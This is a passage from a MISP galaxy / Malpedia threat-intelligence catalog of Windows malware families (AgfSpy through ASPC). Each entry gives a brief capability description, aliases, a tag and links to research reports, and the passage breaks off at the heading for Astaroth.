https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/

https://community.riskiq.com/article/6337984e

https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/

https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/

https://malwarebookreports.com/agent-teslaggah/

https://malwatch.github.io/posts/agent-tesla-malware-analysis/

https://forensicitguy.github.io/agenttesla-rtf-dotnet-tradecraft/

https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.lac.co.jp/lacwatch/report/20220307_002893.html

https://isc.sans.edu/diary/27088

https://www.intrinsec.com/wp-content/uploads/2023/09/TLP-CLEAR-20230912-EN-GuLoader-Information-report.pdf

https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/

https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/

https://news.sophos.com/en-us/2020/05/14/raticate/

https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://isc.sans.edu/diary/rss/28190

https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack

https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir

AgfSpy

The agfSpy backdoor retrieves configuration and commands from its C&C server. These commands allow the backdoor to execute shell commands and send the execution results back to the server. It also enumerates directories and can list, upload, download, and execute files, among other functions. The capabilities of agfSpy are very similar to dneSpy, except each backdoor uses a different C&C server and various formats in message exchanges.

The tag is: misp-galaxy:malpedia="AgfSpy"

AgfSpy is also known as:

Table 2855. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy

https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html

Aldibot

According to Trend Micro Encyclopia: ALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.

This malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.

This bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.

This malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.

This backdoor executes commands from a remote malicious user, effectively compromising the affected system.

The tag is: misp-galaxy:malpedia="Aldibot"

Aldibot is also known as:

Table 2859. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot

Alfonso Stealer

The tag is: misp-galaxy:malpedia="Alfonso Stealer"

Alfonso Stealer is also known as:

Table 2860. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alfonso_stealer

https://twitter.com/3xp0rtblog/status/1344352253294104576

AllaKore

AllaKore is a simple Remote Access Tool written in Delphi, first observed in 2015 but still in early stages of development. It implements the RFB protocol which uses frame buffers and thus is able to send back only the changes of screen frames to the controller, speeding up the transport and visualization control.

The tag is: misp-galaxy:malpedia="AllaKore"

AllaKore is also known as:

Table 2863. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore

https://threatmon.io/the-anatomy-of-a-sidecopy-attack-from-rar-exploits-to-allakore-rat/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf

https://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388

https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d

https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf

https://github.com/Anderson-D/AllaKore

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt

https://blog.talosintelligence.com/2021/07/sidecopy.html

https://twitter.com/_re_fox/status/1212070711206064131

https://www.team-cymru.com/post/allakore-d-the-sidecopy-train

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

AllcomeClipper

Allcome is classified as a clipper malware. Clippers are threats designed to access information saved in the clipboard (the temporary buffer space where copied data is stored) and substitute it with another. This attack is targeted at users who are active in the cryptocurrency sector mainly.

The tag is: misp-galaxy:malpedia="AllcomeClipper"

AllcomeClipper is also known as:

Table 2865. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.allcomeclipper

https://www.gdatasoftware.com/blog/2022/02/37239-allcome-clipbanker-is-a-newcomer-in-malware-underground-forums

https://bazaar.abuse.ch/browse/signature/AllcomeClipper/

AlmaLocker

The tag is: misp-galaxy:malpedia="AlmaLocker"

AlmaLocker is also known as:

Table 2868. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker

AlmondRAT

AlmondRAT is a .NET Remote Access Trojan deployed by the Bitter APT group. It is capable of collecting system information, modifying and exfiltrating data and allows for remote command execution.

The tag is: misp-galaxy:malpedia="AlmondRAT"

AlmondRAT is also known as:

Table 2869. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.almondrat

https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/

ALPC Local PrivEsc

The tag is: misp-galaxy:malpedia="ALPC Local PrivEsc"

ALPC Local PrivEsc is also known as:

Table 2870. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe

https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/

Alphabet Ransomware

The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.

The virus includes a screenlocking function which locks the user’s screen and prohibits any interaction with the computer.

The tag is: misp-galaxy:malpedia="Alphabet Ransomware"

Alphabet Ransomware is also known as:

Table 2871. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware

https://twitter.com/JaromirHorejsi/status/813714602466877440

AlphaLocker

A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.

AlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware’s author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.

AlphaLocker’s encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user’s computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.

To decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.

The tag is: misp-galaxy:malpedia="AlphaLocker"

AlphaLocker is also known as:

Table 2872. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker

https://blog.cylance.com/an-introduction-to-alphalocker

Alreay

Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.

It uses either RC4 or DES for encryption of its configuration, which is stored in the registry.

It sends detailed information about the victim’s environment, like computer name, Windows version, system locale, and network configuration.

It supports almost 25 commands that include operations on the victim’s filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attacker’s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.

It comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).

Alreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.

The tag is: misp-galaxy:malpedia="Alreay"

Alreay is also known as:

Table 2875. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay

https://securelist.com/lazarus-under-the-hood/77908/

https://securelist.com/blog/sas/77908/lazarus-under-the-hood/

Amadey

Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.

The tag is: misp-galaxy:malpedia="Amadey"

Amadey is also known as:

Table 2877. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become

https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer

https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware

https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore

https://asec.ahnlab.com/en/36634/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Amadey/amadey_string_decryptor.py

https://embee-research.ghost.io/amadey-bot-infrastructure/

https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/

https://asec.ahnlab.com/en/44504/

https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html

https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html

https://embee-research.ghost.io/shodan-censys-queries/

https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4

https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do

https://thecyberexpress.com/amadey-botnet-back-via-phishing-sites/

https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.zscaler.com/blogs/security-research/latest-version-amadey-introduces-screen-capturing-and-pushes-remcos-rat

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-amadey-56c8c6ea0ad6

https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/

https://nao-sec.org/2019/04/Analyzing-amadey.html

https://twitter.com/ViriBack/status/1062405363457118210

https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/

https://twitter.com/0xffff0800/status/1062948406266642432

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.anquanke.com/post/id/230116

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://asec.ahnlab.com/en/41450/

https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot

https://www.bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey

https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/

https://isc.sans.edu/diary/27264

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey

https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Amadey/amadey_config_extractor.ipynb

Anatova Ransomware

Anatova is a ransomware family with the goal of ciphering all the files that it can and then requesting payment from the victim. It will also check if network shares are connected and will encrypt the files on these shares too. The code is also prepared to support modular extensions.

The tag is: misp-galaxy:malpedia="Anatova Ransomware"

Anatova Ransomware is also known as:

Table 2879. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom

https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/

Anchor

Anchor is a sophisticated backdoor served as a module to a subset of TrickBot installations. Operating since August 2018 it is not delivered to everybody, but contrary is delivered only to high-profile targets. Since its C2 communication scheme is very similar to the one implemented in the early TrickBot, multiple experts believe it could be attributed to the same authors.

The tag is: misp-galaxy:malpedia="Anchor"

Anchor is also known as:

Table 2880. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/

https://www.netscout.com/blog/asert/dropping-anchor

https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf

https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/

https://unit42.paloaltonetworks.com/ryuk-ransomware/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/

https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth

https://isc.sans.edu/diary/27308

https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/

https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html

https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware

https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns

https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/

https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns

AnchorMTea

Recon/Loader malware attributed to Lazarus, disguised as Notepad++ shell extension.

The tag is: misp-galaxy:malpedia="AnchorMTea"

AnchorMTea is also known as:

Table 2882. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormtea

https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

http://report.threatbook.cn/LS.pdf

Andardoor

The tag is: misp-galaxy:malpedia="Andardoor"

Andardoor is also known as:

  • ROCKHATCH

Table 2883. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor

https://asec.ahnlab.com/ko/47751/

https://asec.ahnlab.com/en/56405/

https://asec.ahnlab.com/ko/56256/

Andromeda

The tag is: misp-galaxy:malpedia="Andromeda"

Andromeda is also known as:

  • B106-Gamarue

  • B67-SS-Gamarue

  • Gamarue

  • b66

Table 2884. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

https://redcanary.com/blog/intelligence-insights-november-2021/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features

http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/

https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html

https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

http://blog.morphisec.com/andromeda-tactics-analyzed

http://resources.infosecinstitute.com/andromeda-bot-analysis/

https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/

https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/

https://www.mandiant.com/resources/blog/turla-galaxy-opportunity

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html

http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/

https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis

https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/

https://eternal-todo.com/blog/andromeda-gamarue-loves-json

https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/

https://blog.avast.com/andromeda-under-the-microscope

AndroMut

According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The “Andro” part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1] and “Mut” is based off a mutex that the analyzed sample creates: “mutshellmy777”.

The tag is: misp-galaxy:malpedia="AndroMut"

AndroMut is also known as:

  • Gelup

Table 2885. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf

https://intel471.com/blog/a-brief-history-of-ta505

AnteFrigus

Ransomware that demands payment in Bitcoin.

The tag is: misp-galaxy:malpedia="AnteFrigus"

AnteFrigus is also known as:

Table 2887. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.antefrigus

https://github.com/albertzsigovits/malware-notes/blob/master/Antefrigus.md

http://id-ransomware.blogspot.com/2019/11/antefrigus-ransomware.html

Antilam

The tag is: misp-galaxy:malpedia="Antilam"

Antilam is also known as:

  • Latinus

Table 2888. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam

Anubis (Windows)

According to Microsoft Security Intelligence, Anubis is an information stealer sold on underground forums since June 2020. The name overlaps with the Android banking malware but is unrelated. It contains code forked from Loki PWS.

The tag is: misp-galaxy:malpedia="Anubis (Windows)"

Anubis (Windows) is also known as:

  • Anubis Stealer

Table 2889. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis

https://twitter.com/MsftSecIntel/status/1298752223321546754

https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/

APERETIF

The tag is: misp-galaxy:malpedia="APERETIF"

APERETIF is also known as:

Table 2891. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aperetif

https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/

Apocalipto

The tag is: misp-galaxy:malpedia="Apocalipto"

Apocalipto is also known as:

Table 2892. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto

https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf

Apollo

This is an implant usable with the Mythic C2 framework. Apollo is a Windows agent written in C# using the 4.0 .NET Framework designed to be used in SpecterOps training offerings.

The tag is: misp-galaxy:malpedia="Apollo"

Apollo is also known as:

Table 2894. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.apollo

https://github.com/MythicAgents/Apollo

Appleseed

The tag is: misp-galaxy:malpedia="Appleseed"

Appleseed is also known as:

  • JamBog

Table 2897. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed

https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf

https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf

https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf

https://asec.ahnlab.com/ko/26705/

https://asec.ahnlab.com/en/36368/

https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf

https://www.youtube.com/watch?v=Dv2_DK3tRgI

https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

https://asec.ahnlab.com/en/41015/

https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf

https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf

https://asec.ahnlab.com/ko/54804/

https://asec.ahnlab.com/en/60054/

https://www.youtube.com/watch?v=rfzmHjZX70s

https://www.telsy.com/download/5654/?uid=4869868efd

https://asec.ahnlab.com/ko/36918/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf

https://asec.ahnlab.com/en/30532/

ArdaMax

According to f-secure, Ardamax is a commercial keylogger program that can be installed onto the system from the product’s website.& When run, the program can capture a range of user activities, such as keystrokes typed, instant messenger chat logs, web browser activity and even screenshots of the active desktop.

This program can be configured to a complete stealth mode, with password protection, to avoid user detection.

The information gathered is stored in an encrypted log file, which is only viewable using the built-in Log Viewer. The log file can be sent to an external party through e-mail, via a local area network (LAN) or by upload to an FTP server (in either HTML or encrypted format).

The tag is: misp-galaxy:malpedia="ArdaMax"

ArdaMax is also known as:

Table 2898. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://medium.com/@MalFuzzer/dissecting-ardamax-keylogger-f33f922d2576

Ares (Windows)

A banking trojan, derived from the source code of win.kronos. In August 2022 it started to incorporate DGA code from win.qakbot.

The tag is: misp-galaxy:malpedia="Ares (Windows)"

Ares (Windows) is also known as:

Table 2900. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ares

https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan

https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga

AresLoader

AresLoader is a new malware "downloader" that has been advertised on some Russian language Dark Web forums “RAMP and "XSS" by a threat actor called "DarkBLUP". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed “Project Ares,” was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer “CerberSec.”

The loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:

  1. Written in C/C++

  2. Supports 64-bit payloads

  3. Makes it look like malware spawned by another process

  4. Prevents non-Microsoft signed binaries from being injected into malware

  5. Hides suspicious imported Windows APIs

  6. Leverages anti-analysis techniques to avoid reverse engineering

Furthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.

The tag is: misp-galaxy:malpedia="AresLoader"

AresLoader is also known as:

Table 2901. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader

https://flashpoint.io/blog/private-malware-for-sale-aresloader/

https://research.openanalysis.net/ares/aresloader/loader/2023/04/02/aresloader.html

https://www.zerofox.com/blog/the-underground-economist-volume-2-issue-24/

https://twitter.com/k3dg3/status/1636873721200746496

https://intel471.com/blog/new-loader-on-the-bloc-aresloader

ArguePatch

During a campaign against a Ukrainian energy provider, a new loader of a new version of CaddyWiper called "ArguePatch" was observed by ESET researchers. ArguePatch is a modified version of Hex-Ray’s Remote Debugger Server (win32_remote.exe). ArguePatch expects a decryption key and the file of the CaddyWiper shellcode as command line parameters.

The tag is: misp-galaxy:malpedia="ArguePatch"

ArguePatch is also known as:

Table 2902. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.arguepatch

https://www.mandiant.com/resources/blog/gru-rise-telegram-minions

https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/

Arid Gopher

This malware is a Go written variant of Micropsia and according to DeepInstinct it is still in development.

The tag is: misp-galaxy:malpedia="Arid Gopher"

Arid Gopher is also known as:

Table 2904. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aridgopher

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks

https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant

https://www.theregister.com/2022/03/22/arid-gopher-malware-deep-instinct/

AridHelper

Helper malware associated with AridGopher, which will provide an alternative persistence mechanism in case "360 total security" is found on a target system.

The tag is: misp-galaxy:malpedia="AridHelper"

AridHelper is also known as:

Table 2905. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aridhelper

https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant

Arik Keylogger

The tag is: misp-galaxy:malpedia="Arik Keylogger"

Arik Keylogger is also known as:

  • Aaron Keylogger

Table 2906. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger

http://remote-keylogger.net/

ArrowRAT

It is available as a service, purchasable by anyone to use in their own campaigns. It’s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.

The tag is: misp-galaxy:malpedia="ArrowRAT"

ArrowRAT is also known as:

Table 2908. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.arrowrat

https://www.arrowrat.com

ARS VBS Loader

ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which at the same time seems to be based on SafeLoader.

The tag is: misp-galaxy:malpedia="ARS VBS Loader"

ARS VBS Loader is also known as:

Table 2909. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader

https://twitter.com/Racco42/status/1001374490339790849

https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/

https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/

Asbit

The tag is: misp-galaxy:malpedia="Asbit"

Asbit is also known as:

Table 2912. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.asbit

https://blogs.juniper.net/en-us/threat-research/asbit-an-emerging-remote-desktop-trojan

AscentLoader

The tag is: misp-galaxy:malpedia="AscentLoader"

AscentLoader is also known as:

Table 2913. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader

ASPC

The tag is: misp-galaxy:malpedia="ASPC"

ASPC is also known as:

Table 2914. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc

Astaroth

